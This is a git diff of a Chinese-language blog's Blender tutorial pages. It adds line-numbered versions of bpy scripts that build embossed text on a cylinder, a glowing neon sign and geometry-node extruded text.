    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"
    1. 形成浮雕有一个简单的方法:ObjectJoin
    @@ -708,78 +706,78 @@

    -
    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj
    +
    1
    2
    3
    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj
    1. 添加 Bevel 使得斜角效果:

    png

    -
    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True
    -
    text_obj.hide_viewport = True
    text_obj.hide_render = True
    +
    1
    2
    3
    4
    5
    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True
    +
    1
    2
    text_obj.hide_viewport = True
    text_obj.hide_render = True
    1. 如果有破,只能自己拿工具填边了:

    png


    完整代码:

    -
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.size = 0.5

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15

    bpy.ops.object.convert(target="MESH")

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj

    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.size = 0.5

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15

    bpy.ops.object.convert(target="MESH")

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj

    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    Neon Light or Neon Sign In Blender | Easy & Realistic Method For Blender Eevee (All Versions)

    1. 新建一个 Text 对象,调整其参数:

    png

    png

    -
    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2
    1. 修改文字:

    png

    -
    text_obj.data.body = "BARBEQUE\nNATION"
    +
    1
    text_obj.data.body = "BARBEQUE\nNATION"
    1. Neon Future Font | dafont.com 找一个适合霓虹灯的字体,应用之:

    png

    -
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)
    +
    1
    2
    3
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)
    1. 设置 extrude

    png

    -
    text_obj.data.extrude = 0.02
    +
    1
    text_obj.data.extrude = 0.02
    1. 添加一个 emission 的材质,设置参数:

    png

    -
    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)
    1. 设置 scene 里的 Bloom

    png

    -
    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25
    +
    1
    2
    3
    4
    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25
    1. 新建一个 plane,用于接受霓虹灯的光线:

    png

    -
    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25
    +
    1
    2
    3
    4
    5
    6
    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25
    1. 从网上找一张贴图,给这个 plane 一个贴图的纹理:

    png

    -
    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))
    +
    1
    2
    3
    4
    5
    6
    7
    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))
    1. 调整其 shader nodes,翻转贴图:

    png

    png

    -
    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)
    1. 添加环境光探针,大小包围平面和文字:

    png

    -
    bpy.ops.object.lightprobe_add(type="GRID")
    +
    1
    bpy.ops.object.lightprobe_add(type="GRID")
    1. 将 Light Probe 的大小包围屏幕和文字:

    png

    -
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]
    +
    1
    2
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]
    1. Bake Cubemap Only
    @@ -788,16 +786,16 @@

    -
    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True
    +
    1
    2
    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True
    1. 添加点光源,补充亮度:

    png

    png

    -
    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5

    完整代码:

    -
    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2

    text_obj.data.extrude = 0.02

    text_obj.data.body = "BARBEQUE\nNATION"
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)

    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)

    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25

    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25

    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))

    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)

    bpy.ops.object.lightprobe_add(type="GRID")
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]

    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True

    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2

    text_obj.data.extrude = 0.02

    text_obj.data.body = "BARBEQUE\nNATION"
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)

    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)

    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25

    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25

    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))

    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)

    bpy.ops.object.lightprobe_add(type="GRID")
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]

    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True

    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5
    @@ -4659,6 +4657,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Blender-Text Effects In Blender (7-12)/index.html b/posts/Blender-Text Effects In Blender (7-12)/index.html index 196bec0f2c..5cb4cf7775 100644 --- a/posts/Blender-Text Effects In Blender (7-12)/index.html +++ b/posts/Blender-Text Effects In Blender (7-12)/index.html @@ -44,8 +44,6 @@ - - @@ -440,119 +438,119 @@

    -
    import bpy
    import os

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier.node_group

    # 删除 Group Input 节点
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # 获取 output node 节点
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    import bpy
    import os

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier.node_group

    # 删除 Group Input 节点
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # 获取 output node 节点
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])
    1. 再添加 Bevel

    png

    -
    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True
    +
    1
    2
    3
    4
    5
    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True
    1. 再添加 Simple Deform

    png

    -
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"
    +
    1
    2
    3
    4
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    完整代码:

    -
    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
